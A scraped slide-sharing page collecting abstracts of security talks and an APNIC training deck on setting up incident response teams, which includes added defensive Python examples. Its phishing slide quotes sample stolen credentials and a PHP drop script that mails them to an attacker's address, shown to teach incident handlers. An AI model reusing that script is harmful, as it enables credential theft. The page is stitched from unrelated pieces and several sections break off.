Application Security - Your Success Depends on it (WSO2)
Traditional information security mainly revolves around network and operating system (OS) level protection. Regardless of the level of security guarding those aspects, the system can be penetrated and the entire deployment can be brought down if your application's security isn't taken into serious consideration. Information security should ideally start at the application level, before network and OS level security is ensured. To achieve this, security needs to be integrated into the application at the software development phase.
In this session, Dulanja will discuss the following:
The importance of application security - why network and OS security is insufficient.
Challenges in securing your application.
Making security part of the development lifecycle.
Building a Next-Generation Security Operations Center (SOC) (Sqrrl)
So, you need to build a Security Operations Center (SOC)? What does that mean? What does the modern SOC need to do? Learn from Dr. Terry Brugger, who has been doing information security work for over 15 years, including building out a SOC for a large Federal agency and consulting for numerous large enterprises on their security operations.
Watch the presentation with audio here: http://info.sqrrl.com/sqrrl-october-webinar-next-generation-soc
Secrets to managing your Duty of Care in an ever-changing world.
How well do you know your risks?
Are you keeping up with your responsibilities to provide Duty of Care?
How well are you prioritising Cybersecurity initiatives?
Liability for Cybersecurity attacks sits with Executives and Board members who may not have the right level of technical security knowledge. This session will outline what practical steps executives can take to implement a Cybersecurity Roadmap that is aligned with its strategic objectives.
Led by Krist Davood, who has spent over 28 years implementing secure mission critical systems for executives. Krist is an expert in protecting the interconnectedness of technology, intellectual property and information systems, as evidenced through his roles at The Good Guys, Court Services Victoria and Schiavello.
The seminar will cover:
• Fiduciary responsibility
• How to efficiently deal with personal liability and the threat of court action
• The role of a Cybersecurity Executive Dashboard and its ability to simplify risk and amplify informed decision making
• How to identify and bridge the gap between your Cybersecurity Compliance Rating and the threat of court action
Introduction to Web Application Penetration Testing (Anurag Srivastava)
Web Application Pentesting
* The process of checking and penetrating the security of a web application or website
* The process involves an active analysis of the application for any weaknesses, technical flaws, or vulnerabilities
* Any security issues that are found will be presented to the system owner, together with an assessment of the impact, a proposal for mitigation or a technical solution.
Talking about the Next-Gen Security Operations Center for IDNIC+APJII as a representative of IDSECCONF. A people-centric SOC requires a lot of investment in people, in terms of both quantity and quality; unfortunately, (good) IT security people are getting rare these days. Organisations need to put more of their investment into technology since, as in Industry 4.0, machines are getting more advanced at supporting humans with continuous and repetitive tasks.
Moving from a "traditional" to a next-gen SOC requires a proper plan, and that is what this talk was about.
( ** Cyber Security Training: https://www.edureka.co/cybersecurity-certification-training ** )
This Edureka PPT on "Penetration Testing" will help you understand all about penetration testing, its methodologies, and tools. Below is the list of topics covered in this session:
What is Penetration Testing?
Phases of Penetration Testing
Penetration Testing Types
Penetration Testing Tools
How to perform Penetration Testing on Kali Linux?
Cyber Security Playlist: https://bit.ly/2N2jlNN
Cyber Security Blog Series: https://bit.ly/2AuULkP
Instagram: https://www.instagram.com/edureka_lea...
Facebook: https://www.facebook.com/edurekaIN/
Twitter: https://twitter.com/edurekain
LinkedIn: https://www.linkedin.com/company/edureka
An introductory overview of cybersecurity covering its technical and non-technical aspects.
We define what cybersecurity is, discuss the risks and impacts of a cybersecurity breach, and present means of avoiding one, both in terms of regulations (Common Criteria, FIPS, ...) and of technology, including some cryptography; we finish with some facts and figures.
Infections cost organizations billions of dollars in lost time and productivity, as well as ransom payments and other indirect costs, like damage to a business’s reputation.
End-users will learn about password management, multi-factor authentication and how to secure their laptops and desktops while working remotely.
This session will teach professionals how to avoid becoming a statistic.
Agenda: Foundations of security awareness | Common threats | Three ways to secure your work environment | Best practices for users | The work from home checklist
** CyberSecurity Certification Training: https://www.edureka.co/cybersecurity-certification-training **
This Edureka tutorial on "Cybersecurity Frameworks" will help you understand why and how the organizations are using the cybersecurity framework to Identify, Protect and Recover from cyber attacks.
Cybersecurity Training Playlist: https://bit.ly/2NqcTQV
From SIEM to SOC: Crossing the Cybersecurity Chasm (Priyanka Aash)
You own a SIEM, but to be secure, you need a Security Operations Center! How do you cross the chasm? Do you hire staff or outsource? And what skills are needed? Mike Ostrowski, a cybersecurity industry veteran, will review common pitfalls experienced through the journey from SIEM to SOC, the pros and cons of an all in-house SOC vs. outsourcing, and the benefits of a hybrid SOC model.
Learning Objectives:
1: You own a SIEM, but to be secure, you need a SOC. How do you cross the chasm?
2: What are the pros and cons of in-house, fully managed and hybrid security?
3: What considerations go into deciding whether to employ a hybrid strategy?
(Source: RSA Conference USA 2018)
Cyber Security 101: Training, awareness, strategies for small to medium sized... (Stephen Cobb)
I developed "Cyber Security 101: Training, awareness, strategies for small to medium sized business" for the second annual Small Business Summit on Security, Privacy, and Trust, co-hosted by ADP in New Jersey, October 2013.
Planning and Deploying an Effective Vulnerability Management Program (Sasha Nunke)
This presentation covers the essential components of a successful Vulnerability Management program that allows you to proactively identify risk in order to protect your network and critical business assets.
Key take-aways:
* Integrating the 3 critical factors - people, processes & technology
* Saving time and money via automated tools
* Anticipating and overcoming common Vulnerability Management roadblocks
* Meeting security regulations and compliance requirements with Vulnerability Management
SOC Architecture - Building the NextGen SOC (Priyanka Aash)
Why are APTs difficult to detect
Revisit the cyber kill chain
Process orient detection
NextGen SOC Process
Building your threat mind map
Implement and measure your SOC
Cyber Threat Intelligence is a process in which information from different sources is collected, then analyzed to identify and detect threats against any environment. The information collected could be evidence-based knowledge that could support the context, mechanism, indicators, or implications about an already existing threat against an environment, and/or the knowledge about an upcoming threat that could potentially affect the environment. Credit: Marlabs Inc
Secure web programming plus end users' awareness are the last line of defense against attacks targeted at corporate systems, particularly web applications, in the era of the World Wide Web.
Most web application attacks occur through Cross-Site Scripting (XSS) and SQL Injection. Most web application vulnerabilities, in turn, arise from weak coding: failure to properly validate users' input, and failure to properly sanitize output when displaying data to visitors.
The literature also confirms the following web application weaknesses in 2010: 26% improper output handling, 22% improper input handling, and 15% insufficient authentication, and others.
Abdul Rahman Sherzad, lecturer at the Computer Science Faculty of Herat University and Ph.D. student at the Technical University of Berlin, gave a presentation at the 12th IT Conference on Higher Education for Afghanistan at MoHE, and then conducted a seminar at Hariwa Institute of Higher Education in Herat, Afghanistan, introducing web application security threats by demonstrating the security problems that exist in corporate systems, with a strong emphasis on secure development. Major security vulnerabilities and secure design and coding best practices for designing and developing web-based applications were covered.
The main objective of the presentation was raising awareness about the problems that might occur in web-application systems, as well as secure coding practices and principles. The presentation's aims were to build security awareness for web applications, to discuss the threat landscape and the controls users should use during the software development lifecycle, to introduce attack methods, to discuss approaches for discovering security vulnerabilities, and finally to discuss the basics of secure web development techniques and principles.
Collaboration Between Infosec Community and CERT Teams: Project Sonar case (Valdes Nzalli)
Along with their day-to-day duties, CERT/CSIRT teams need to be aware of the security state of their subscribers/clients. My goal here is to present this initiative named "Project Sonar", started by many members of the Infosec Community. Also, I would like to present a use case in which the collaboration between the CERT/CSIRT team and the Infosec Community can be more profitable for all of us. This use case will be based on an analysis of some data provided by Project Sonar.
Statistical Study of One Month of Vulnerabilities in Africa (Valdes Nzalli)
More and more devices are connected to the Internet these days, helped by falling bandwidth prices, so it is now easier to host a service yourself, for example. But this growth is not matched by the security measures applied to connected devices. Our talk aims to reveal the statistics of an audit of the Internet in Africa over a one-month period. We were thus able to identify several cases, such as machines that are members of botnets, servers open to the public but not patched, and many others. From these results we produced a ranking by country, application, system, etc., together with their frequency.
Download this free beginner's guide to learning and mastering the basics of Chinese.
The pdf guide is more than 60 pages of vocabulary, grammar and lessons grouped around 20 basic questions & answers that you will want to master as a beginner. You can print it out to go through on your own or participate live at: http://studymorechinese.com/
Ethical Hacking and Cybersecurity – Key Trends in 2022 (PECB)
In recent years, there has been a significant number of cyberattacks resulting in massive business disruptions.
In this regard, many organizations are hiring ethical hacking groups to help prevent future attacks.
Amongst others, the webinar covers:
• 2021 Cyber-incidents
• 2021 Black swans
• Ransomware vNext
• IoT - internet of things
• Cyber security insurance evolution
• Cyber best practices & frameworks
• The 2022 black swans
Presenter:
Our first presenter for this webinar is Peter Geelen, director and managing consultant at CyberMinute and Owner of Quest for Security, Belgium. Over more than 20 years, Peter has built strong experience in enterprise security & architecture and Identity & Access management, but also privacy, information & data protection, and cyber- and cloud security. In the last few years, his focus has been on ISO/IEC 27001 and other ISO certification mechanisms. Peter is an accredited Lead Auditor for ISO/IEC 27001 and ISO 9001, a PECB Trainer and a Fellow in Privacy.
Our second presenter is Erwin AM Geirnaert, Co-founder and Chief Application Security Architect at Shift Left Security, a Belgian cybersecurity start-up specialized in securing start-ups, scale-ups and SMBs against malicious cybercriminals. Erwin is a specialist in mobile security, J2EE security, .NET security, API security and web services security. Erwin has more than 20 years' experience in executing security tests, aka penetration testing, of web applications, mobile apps, APIs and thick client applications. He is also a recognized application security expert and speaker at international events like Javapolis, LSEC, OWASP, Eurostar, Infosecurity, etc.
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: https://pecb.com/whitepaper/iso-27001-information-technology--security-techniques-information-security--management-systems---requirements
Webinars: https://pecb.com/webinars
Article: https://pecb.com/article
Whitepaper: https://pecb.com/whitepaper
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
YouTube video: https://youtu.be/ZHQQ1yJX2uU
Today's Breach Reality, The IR Imperative, And What You Can Do About It (Resilient Systems)
Despite changing threats and the near certainty of compromise, most IT security programs are much the same as they were a decade ago. How have attacker motivations and tactics changed, and why? What does this mean for IT security departments, and how must they adapt?
This webinar will detail the security challenges organizations face today, the implications of changes in attacker tactics and motivations, and what firms can do to better align their security program with today's reality.
Our featured speakers for this webinar will be:
- Ted Julian, Chief Marketing Officer, Co3 Systems
- Colby Clark, Director of Incident Management, Fishnet Security
Protecting Your Business - All Covered Security Services (All Covered)
All Covered is a nationwide provider of IT services and security. This presentation highlights the most essential factors that businesses need to be aware of when implementing their security plan. It shows how any company, regardless of size, is at risk with external, and internal, security threats.
Whether you own a small, medium, or large business, IT security should be at the forefront of any discussion. It is better to be proactive and prevent an attack from happening than having to pick up the pieces after the damage has already been done to your business.
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation (Scott Sutherland)
This presentation provides an overview of common adversarial emulation approaches along with attack and detection trends. It should be interesting to penetration testers and professionals in security operations roles.
ASEAN-JAPAN Cyber Security Seminar: How to fill your team gaps with training (APNIC)
APNIC Senior Security Specialist Adli Wahid presents on identifying skill gaps and how to meet them at the ASEAN-JAPAN Cyber Security Seminar, held online on 11 August 2021.
Cybersecurity: Malware & Protecting Your Business From Cyberthreats (SecureDocs)
http://www.securedocs.com - The recent increase in high-profile cyberattacks has made online security a hot topic, and rightfully so. Companies from The New York Times to Facebook have fallen victim to attacks by cybercriminals, highlighting just how vulnerable any business is. In the past few years, malware has evolved dramatically and is a serious threat to all organizations, both big and small.
This presentation covers what advanced malware is and the impact it can have on an organization. Learn how to protect your business from this type of threat.
Security is now important to all of us, not just people who work at Facebook. Most developers think about security in terms of security technologies that they want to apply to their systems, and then ask how secure the system is. From a secure systems perspective, this is the wrong way around. To build a secure system, you need to start from the things that need to be protected and the threats to those resources.
In this session, Eoin dives into the fundamentals of system security to introduce the topics we need to understand in order to decide how to secure our systems.
This presentation was delivered at SkyDogCon 6 in October 2016. The A/V is available here: https://www.youtube.com/watch?list=PLLEf-wPc7Tyae19iTuzKOXmPj-IQBIWuU&v=mKxGulV2Z74
It is an updated version of the original deck presented at BSides Augusta 2016 - Added original content including information on use cases and added definition/clarity.
Abstract:
"We can all agree that threat ("Evil") detection is an essential component of a functioning security monitoring program. Let's start thinking about how to take our tradecraft to the next level and hunt for insecure conditions ("Ways for Evil to do Evil things") that might allow threat actors to succeed in their mission.
This talk will run through some of the observations gathered during hunting expeditions inside the networks of multiple Fortune-ranked organizations and challenge you to expand your security operations thinking beyond signature-based detection.
- What is Hunting?
- How have we done it?
- What have we found, and what should be done about those findings?
- How might you achieve similar outcomes in your own environment?"
Speakers:
- Jacqueline Stokes (@find_evil) is an infosec enthusiast who picked up hacking as a preteen and cut her teeth over multiple years in Iraq. Her ongoing mission is to assess and advise clients on the most actionable and forward-thinking methods to improve detection, response, and containment of advanced threats. Jackie likes long walks on the beach, 90's nostalgia, and is the president and founding member of the Kevin Mandia Fan Club.
My Incident Response talk from Techfair 2016 in Jersey. The talk explores how incident response could comply with the requirements set out in the Jersey Financial Services Commission "Dear CEO" letter on cyber security.
Dave Beesley, Technical Director, Novosco, presented at Cloud Expo 2017 on 'Delivering security services in the new world', held at the ExCeL in London's Docklands.
Applications are constantly under attack. Unfortunately, nearly all applications have no capability of detecting an attacker or responding before a breach occurs. Those applications sit passively and allow the attacker to constantly unleash attack after attack. Let's change the game and equip our application with the resources to detect an attack with high accuracy and respond in real time to prevent a compromise by eliminating the threat from the system.
In this talk we'll cover the OWASP AppSensor project – a project that details how to instrument an application to become attack aware and immediately respond to neutralize threats. This project is backed by multiple talented security experts that have been advancing the project for the past three years. AppSensor has been featured in the Department of Defense Cross Talk journal, presented at the US Department of Homeland Security resilient software conference and at security conferences around the world.
Cambodia CERT Seminar: Incident response for ransomware attacks (APNIC)
Senior Security Specialist Adli Wahid presents on incident response for ransomware attacks at the Cambodia CERT Seminar, held online on 13 August 2021.
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016 (Danny Akacki)
We can all agree that threat detection is an essential component of a functioning security monitoring program. Let's start thinking about how to take our tradecraft to the next level and hunt for ways for evil to do evil things. This talk will run through some of the observations gathered during hunting expeditions inside the networks of multiple Fortune-ranked organizations. We hope to challenge you to expand your security operations, moving beyond traditional signature-based detection.
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024 (APNIC)
Ellisha Heppner, Grant Management Lead, presented an update on APNIC Foundation to the PNG DNS Forum held from 6 to 10 May, 2024 in Port Moresby, Papua New Guinea.
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I... (APNIC)
Chimi Dorji, Internet Resource Analyst at APNIC, presented on Registry Data Accuracy Improvements at SANOG 41 jointly held with INNOG 7 in Mumbai, India from 25 to 30 April 2024.
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E... (APNIC)
Sunny Chendi, Senior Advisor, Membership and Policy at APNIC, presents 'APNIC Policy Roundup' at the 5th ICANN APAC-TWNIC Engagement Forum and 41st TWNIC OPM in Taipei, Taiwan from 23 to 24 April.
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024 (APNIC)
Dave Phelan, Senior Network Analyst/Technical Trainer at APNIC, presents 'DDoS In Oceania and the Pacific' at NZNOG 2024 held in Nelson, New Zealand from 8 to 12 April 2024.
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op... (APNIC)
Geoff Huston, Chief Scientist at APNIC, delivered a keynote presentation on the 'Future Evolution of the Internet' at the Everything Open 2024 conference in Gladstone, Australia from 16 to 18 April 2024.
IP addressing and IPv6, presented by Paul Wilson at IETF 119 (APNIC)
Paul Wilson, Director General of APNIC delivers a presentation on IP addressing and IPv6 to the Policymakers Program during IETF 119 in Brisbane Australia from 16 to 22 March 2024.
draft-harrison-sidrops-manifest-number-01, presented at IETF 119 (APNIC)
Tom Harrison, Product and Delivery Manager at APNIC, presents at the Registration Protocols Extensions working group during IETF 119 in Brisbane, Australia from 16 to 22 March 2024.
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...APNIC
Che-Hoo Cheng, Senior Director, Development at APNIC presents on the "Benefits of doing Internet peering and running an Internet Exchange (IX)" at the Communications Regulatory Commission of Mongolia's IPv6, IXP, Datacenter - Policy and Regulation International Trends Forum in Ulaanbaatar, Mongolia on 7 March 2024
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC
APNIC Senior Advisor, Membership and Policy, Sunny Chendi presented on APNIC updates and RIR Policies for ccTLDs at APTLD 85 in Goa, India from 19-22 February 2024.
1.Wireless Communication System_Wireless communication is a broad term that i...JeyaPerumal1
Wireless communication involves the transmission of information over a distance without the help of wires, cables or any other forms of electrical conductors.
Wireless communication is a broad term that incorporates all procedures and forms of connecting and communicating between two or more devices using a wireless signal through wireless communication technologies and devices.
Features of Wireless Communication
The evolution of wireless technology has brought many advancements with its effective features.
The transmitted distance can be anywhere between a few meters (for example, a television's remote control) and thousands of kilometers (for example, radio communication).
Wireless communication can be used for cellular telephony, wireless access to the internet, wireless home networking, and so on.
Multi-cluster Kubernetes Networking- Patterns, Projects and GuidelinesSanjeev Rampal
Talk presented at Kubernetes Community Day, New York, May 2024.
Technical summary of Multi-Cluster Kubernetes Networking architectures with focus on 4 key topics.
1) Key patterns for Multi-cluster architectures
2) Architectural comparison of several OSS/ CNCF projects to address these patterns
3) Evolution trends for the APIs of these projects
4) Some design recommendations & guidelines for adopting/ deploying these solutions.
# Internet Security: Safeguarding Your Digital World
In the contemporary digital age, the internet is a cornerstone of our daily lives. It connects us to vast amounts of information, provides platforms for communication, enables commerce, and offers endless entertainment. However, with these conveniences come significant security challenges. Internet security is essential to protect our digital identities, sensitive data, and overall online experience. This comprehensive guide explores the multifaceted world of internet security, providing insights into its importance, common threats, and effective strategies to safeguard your digital world.
## Understanding Internet Security
Internet security encompasses the measures and protocols used to protect information, devices, and networks from unauthorized access, attacks, and damage. It involves a wide range of practices designed to safeguard data confidentiality, integrity, and availability. Effective internet security is crucial for individuals, businesses, and governments alike, as cyber threats continue to evolve in complexity and scale.
### Key Components of Internet Security
1. **Confidentiality**: Ensuring that information is accessible only to those authorized to access it.
2. **Integrity**: Protecting information from being altered or tampered with by unauthorized parties.
3. **Availability**: Ensuring that authorized users have reliable access to information and resources when needed.
## Common Internet Security Threats
Cyber threats are numerous and constantly evolving. Understanding these threats is the first step in protecting against them. Some of the most common internet security threats include:
### Malware
Malware, or malicious software, is designed to harm, exploit, or otherwise compromise a device, network, or service. Common types of malware include:
- **Viruses**: Programs that attach themselves to legitimate software and replicate, spreading to other programs and files.
- **Worms**: Standalone malware that replicates itself to spread to other computers.
- **Trojan Horses**: Malicious software disguised as legitimate software.
- **Ransomware**: Malware that encrypts a user's files and demands a ransom for the decryption key.
- **Spyware**: Software that secretly monitors and collects user information.
### Phishing
Phishing is a social engineering attack that aims to steal sensitive information such as usernames, passwords, and credit card details. Attackers often masquerade as trusted entities in email or other communication channels, tricking victims into providing their information.
### Man-in-the-Middle (MitM) Attacks
MitM attacks occur when an attacker intercepts and potentially alters communication between two parties without their knowledge. This can lead to the unauthorized acquisition of sensitive information.
### Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) Attacks
1. Setting up Computer Security Incident Response Teams (CSIRTs)
Adli Wahid
Security Specialist
adli@apnic.net
Issue Date: 05 June 2014
Revision: V 1.1
2. About Me
• Adli Wahid
• Current Role
– Security Specialist, APNIC
• Previous Roles
– Cyber Security Manager, Bank of Tokyo-Mitsubishi UFJ
– VP Cyber Security Response Services, CyberSecurity Malaysia &
Head of Malaysia CERT (MYCERT)
– Lecturer, International Islamic University Malaysia
• Follow APNIC and me on Twitter!
– @apnic && @adliwahid
3
3. Agenda
• Cyber Threats Landscape
• Setting up Computer / Cyber Security Response Team
• Tools for incident handling and analysis
• Exercises
4
7. Cyber Security Framework
• How do we think about security?
• Ensuring the CIA
– Confidentiality, Integrity, Availability
• Collection of activities to address Risk
– Risk = Threats x Vulnerabilities
– Dealing with the Known & Unknown
• People, Process, Technology
• Dynamic & Continuous Approach
– Including Learning from Incidents
– Applying Best Current Practices
8
(Figure: CIA triad diagram – Confidentiality, Integrity, Availability)
9. The Threat Landscape
• Highlights of cyber security incidents
• What do they mean for a CERT / CSIRT?
• Understanding risk and impact associated with the threats or incidents
• Thinking about actions required for dealing with the incidents
10
10. Cyber Threats
• Malware Related
• Data Breaches
• Distributed Denial of Service Attacks
• Web Defacement
• Spam
• Phishing
• Scanning / Attempts
• Content Related
11
11. Malware-Related
• The Problem
– Malicious software has different infection vectors and ‘payloads’
– Different consequences once a computer is infected
– Millions of infected computers
– Complex ‘infrastructure’ for spreading malware and controlling infected computers
12
12. Malware-Related
• Different Types of Malware
– Bots & Botnets
– Ransomware
– ExploitKits
• What do CSIRTs have to Handle?
– Infected computers
– Infection points
• Command & Controls
• Web Sites
– Organise Take-Downs Efforts (Conficker, DNSChanger)
– Write Advisory (for removal)
– Work with Law Enforcement Agencies
13
16. DoS and DDoS
• DoS:
– Source of attack: a small number of nodes
– Source IP typically spoofed
• DDoS:
– From thousands of nodes
– IP addresses often not spoofed
• What you need to handle
– Source of DDoS attack
• What if the IP is spoofed?
– Victim of DDoS attack
– Services/sites facilitating DDoS attacks
• Help promote BCP38 / Source Address Validation too!
17
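The slide recommends promoting BCP38 / source address validation as the structural fix for spoofed-source DoS. The script below is an added example, not part of the deck, that models the ingress check an edge router performs: a packet arriving on a customer-facing interface is forwarded only if its source address belongs to a prefix assigned to that interface, and everything else is counted as spoofed. The interface names, prefixes and packets are all constructed.

```python
"""Added example (not from the slides): BCP38 / source address validation.

Models the ingress check an edge router performs: a packet arriving on a
customer-facing interface is forwarded only if its source address falls
in a prefix delegated to that interface.  Anything else is treated as
spoofed.  The interface table and packets are constructed sample data.
"""
import ipaddress
from collections import Counter

# Constructed assignment table: customer interface -> prefixes delegated to it.
INGRESS_PREFIXES = {
    "ge-0/0/1": [ipaddress.ip_network("203.0.113.0/24")],
    "ge-0/0/2": [ipaddress.ip_network("198.51.100.0/25"),
                 ipaddress.ip_network("2001:db8:1::/48")],
}


def source_is_valid(ingress_iface, src_ip):
    """True if src_ip lies in a prefix assigned to ingress_iface (the BCP38 test)."""
    addr = ipaddress.ip_address(src_ip)
    return any(addr in net for net in INGRESS_PREFIXES.get(ingress_iface, []))


def filter_packets(packets):
    """Split packets into (forwarded, dropped) lists.

    Each packet is a constructed (ingress_iface, src_ip, dst_ip) tuple.
    """
    forwarded, dropped = [], []
    for iface, src, dst in packets:
        bucket = forwarded if source_is_valid(iface, src) else dropped
        bucket.append((iface, src, dst))
    return forwarded, dropped


def spoofing_summary(dropped):
    """Count dropped packets per ingress interface to find the offending port."""
    return Counter(iface for iface, _, _ in dropped)


# Constructed traffic: 192.0.2.7 is a victim whose address is being spoofed.
SAMPLE_PACKETS = [
    ("ge-0/0/1", "203.0.113.10", "8.8.8.8"),                # legitimate
    ("ge-0/0/1", "192.0.2.7", "9.9.9.9"),                   # spoofed victim address
    ("ge-0/0/1", "192.0.2.7", "1.1.1.1"),                   # spoofed victim address
    ("ge-0/0/2", "198.51.100.200", "8.8.8.8"),              # outside the assigned /25
    ("ge-0/0/2", "2001:db8:1::5", "2001:4860:4860::8888"),  # legitimate IPv6
]

if __name__ == "__main__":
    fwd, drop = filter_packets(SAMPLE_PACKETS)
    print(f"forwarded={len(fwd)} dropped={len(drop)}")
    print(dict(spoofing_summary(drop)))
```

The per-interface counter is the piece an operator actually wants: a customer port that keeps sourcing addresses it was never assigned is either misconfigured or hosting a spoofing attacker, and is the place to follow up.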
19. DDoS: Reflection attack
• Spoof source IP address = victim’s IP
• Goal: generate lengthy or numerous replies for short requests: amplification
– Without amplification: would it make sense?
• January 2001 attack:
– requests for large DNS record
– generated 60-90 Mbps of traffic
• Reflection attacks can also be done with Web and other services
20
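From the victim's side, a DNS reflection attack looks like many resolvers sending large UDP/53 responses to one host that sent them few or no queries. The detector below is an added example, not from the slides, that runs that test over flow records; the record layout, thresholds and the flows themselves are constructed assumptions, and the amplification ratio is only computed when the destination actually sent some queries.

```python
"""Added example (not from the slides): spotting DNS reflection/amplification
in flow records.  A destination that receives DNS responses from many
sources, with a large bytes-per-packet, while itself sending little or no
DNS query traffic, is a likely reflection victim.  Flow layout and
thresholds are assumptions; the flows are constructed sample data.
"""
from collections import defaultdict

# Constructed flows: (src_ip, src_port, dst_ip, dst_port, proto, packets, bytes)
FLOWS = [
    # Responses from several open resolvers converging on the victim 192.0.2.7
    ("198.51.100.1", 53, "192.0.2.7", 40000, "udp", 1000, 3_000_000),
    ("198.51.100.2", 53, "192.0.2.7", 40001, "udp", 1200, 3_600_000),
    ("198.51.100.3", 53, "192.0.2.7", 40002, "udp", 900, 2_700_000),
    ("203.0.113.9", 53, "192.0.2.7", 40003, "udp", 1100, 3_300_000),
    # A normal client doing a few lookups against its own resolver
    ("192.0.2.50", 51234, "198.51.100.1", 53, "udp", 3, 210),
    ("198.51.100.1", 53, "192.0.2.50", 51234, "udp", 3, 450),
]


def detect_reflection(flows, min_sources=3, min_resp_bytes_per_pkt=1000):
    """Return {dst_ip: stats} for destinations that look like reflection victims."""
    responses = defaultdict(lambda: {"sources": set(), "bytes": 0, "packets": 0})
    queries = defaultdict(int)  # DNS query bytes *sent by* each host
    for src, sport, dst, dport, proto, pkts, nbytes in flows:
        if proto != "udp":
            continue
        if sport == 53:            # a DNS response flow arriving at dst
            r = responses[dst]
            r["sources"].add(src)
            r["bytes"] += nbytes
            r["packets"] += pkts
        elif dport == 53:          # a DNS query flow leaving src
            queries[src] += nbytes

    suspects = {}
    for dst, r in responses.items():
        if not r["packets"]:
            continue
        bpp = r["bytes"] / r["packets"]
        if len(r["sources"]) >= min_sources and bpp >= min_resp_bytes_per_pkt:
            q = queries.get(dst, 0)
            suspects[dst] = {
                "sources": len(r["sources"]),
                "response_bytes": r["bytes"],
                "bytes_per_packet": round(bpp, 1),
                "query_bytes": q,
                # Responses with no matching queries are the signature itself;
                # a ratio only makes sense when the host sent something.
                "amplification": round(r["bytes"] / q, 1) if q else None,
            }
    return suspects


if __name__ == "__main__":
    for victim, stats in detect_reflection(FLOWS).items():
        print(victim, stats)
```

The reflectors (the 198.51.100.x resolvers here) are themselves a second thing to handle, as the slides note under "services/sites facilitating DDoS attacks": their operators need to be told they are running open resolvers.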
21. Data Breaches
• The Problem
– Hundreds and thousands of credentials (usernames and passwords) being exposed and shared publicly
• By accident or on purpose
• e.g. on Scribd
• CSIRTs/CERTs are contacted to handle / co-ordinate so that accounts are not further abused
• Handling
– Contacting the owners of credentials
– Contacting the owner of the system where credentials are being dumped
• SQL injection vulnerability, misconfiguration
– Improving the authentication mechanism (2FA?)
– Removing the credentials
22
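The first handling step on the slide, contacting the owners of exposed credentials, starts with working out which organisations are affected. The script below is an added example, not from the deck, that triages a constructed credential dump: it de-duplicates entries, groups affected accounts by e-mail domain so each owner can be notified once, counts lines it cannot parse, and never carries the secrets into the report.

```python
"""Added example (not from the slides): triaging a leaked credential dump.

Groups affected accounts by domain so the right owners can be contacted,
de-duplicates repeated entries, and keeps passwords out of the report
(only their length is retained).  The dump below is constructed.
"""
import re
from collections import defaultdict

# Constructed dump in the common "user:password" layout seen in public pastes.
SAMPLE_DUMP = """\
alice@example.com:hunter2
bob@example.com:pass123
carol@bank.example:Summer2014
alice@example.com:hunter2
din:1234567
this line is not a credential
"""

EMAIL_RE = re.compile(r"^[^@\s:]+@([A-Za-z0-9.-]+\.[A-Za-z]{2,})$")


def triage_dump(text):
    """Return (accounts_by_domain, malformed_lines, unique_entries)."""
    by_domain = defaultdict(set)
    seen = set()
    malformed = 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        user, sep, secret = line.partition(":")
        if not sep or not user or not secret:
            malformed += 1
            continue
        if (user, secret) in seen:       # same entry pasted twice
            continue
        seen.add((user, secret))
        m = EMAIL_RE.match(user)
        domain = m.group(1).lower() if m else "(no domain)"
        by_domain[domain].add(user)
    return {d: sorted(u) for d, u in by_domain.items()}, malformed, len(seen)


def redacted_preview(text):
    """Ticket-safe view: the account and the password's length, never the password."""
    rows = []
    for raw in text.splitlines():
        user, sep, secret = raw.strip().partition(":")
        if sep and user and secret:
            rows.append(f"{user} (password length {len(secret)})")
    return rows


if __name__ == "__main__":
    groups, bad, unique = triage_dump(SAMPLE_DUMP)
    print(f"{unique} unique entries, {bad} unparsable line(s)")
    for domain, accounts in sorted(groups.items()):
        print(f"  notify {domain}: {', '.join(accounts)}")
    print("\n".join(redacted_preview(SAMPLE_DUMP)))
```

Accounts without a domain part (the "(no domain)" bucket) are usually local logins of whichever site was breached, so they go to the system owner rather than to individual users.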
22. Phishing
• The Problem
– Active attempt to trick users to give credentials
– Use a combination of email, social media and fake websites
• What needs to be handled
– Source of Phishing Email
– Fake website
– Credentials stolen
– Accounts or sites collecting phishing credentials (drop sites)
23
23. Phishing Example
(Figure: annotated phishing example with four numbered callouts; the text of each part follows)
• The phishing email:
  Dear Intelligent User,
  We have introduced a new security feature on our website. Please reactivate your account here: http://www.bla.com.my
  p.s This is NOT a Phish Email
• The fake login form: Login / Password
• Credentials captured by the fake site:
  din:1234567
  joey:cherry2148
  boss:abcdefgh123
  finance:wky8767
  admin:testtest123
• The drop script that mails captured credentials to the attacker:
  <?
  $mailto='criminal@gmail.com';
  mail($mailto,$subject,$message);
  ?>
24
24. Spam
• The Problem
– Unsolicited emails
– Waste of bandwidth, cost money
– Leads to other problems
• What you need to handle
– Source of email
25
27. Compromised Web Sites
• The Problem
– Web sites compromised leading to defacement or abused for other types of attacks
– Possibly caused by: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
– Mass Defacements
– Pre-Announced Attacks
• What you need to handle / co-ordinate
– Contacting owner of the website
– Handling the source of attack
28
28. Recap on Cyber Threats
• Understanding the different types of cyber threats is the first step before you start handling or responding to the incidents
• Abuse or IRT contacts could be the first to be contacted
• Questions to ask
– How does it work?
– What is the impact?
– What do we have to ‘handle’?
– Who should I contact / escalate to?
– What should be prioritised?
• CSIRTs/CERTs can be contacted at the different stages of the attacks or incidents
29
30. Outcomes of this Module
1. Understand the importance of responding to and handling security incidents
2. Be familiar with the requirements for setting up a CERT / CSIRT
3. Identify organisations to connect with for collaboration & cooperation
31
32. Incidents Happen!
• Despite your best efforts to keep the Internet safe, secure and reliable – things happen
• What we have seen
– Malware, Botnets, Exploit Kits, Ransomware, DDoS Attacks, Anonymous, 0-days, Web Defacement
– Data Breaches and Disclosures
– And many more!
• What is the worst that can happen to you?
33
33. Incidents Happen! (2)
• Incidents may affect
